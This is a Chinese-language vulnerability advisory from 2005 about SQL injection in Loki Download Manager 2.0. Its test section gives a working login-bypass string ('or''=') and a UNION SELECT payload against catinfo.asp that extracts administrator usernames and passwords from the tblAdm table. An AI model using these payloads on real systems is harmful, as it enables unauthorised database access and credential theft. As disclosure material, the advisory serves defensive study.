Loki Download Manager远程SQL注入漏洞
发布日期:2005-06-09
更新日期:2005-06-09
受影响系统:
Loki Loki Download Manager 2.0描述:
BUGTRAQ ID: 13898,13900
Loki Download Manager是一个Unix兼容脚本,用于管理文件下载。
Loki Download Manager中存在SQL注入漏洞,远程攻击者可能利用此漏洞非法访问数据库。
起因是在SQL查询中使用用户输入之前没有正确的过滤default.asp和catinfo.asp脚本的输入。成功利用这个漏洞可能导致破坏应用程序,泄漏或修改数据,或入侵基础数据库。
<*来源:Salmanooh (hack_912@hotmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111826992711703&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
user: anyuser
pass: 'or''='
2. 在http://localhost/downmancv/catinfo.asp?cat=' union select中:
null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm'
建议:
厂商补丁:
Loki
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.lokithetrickster.net/
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
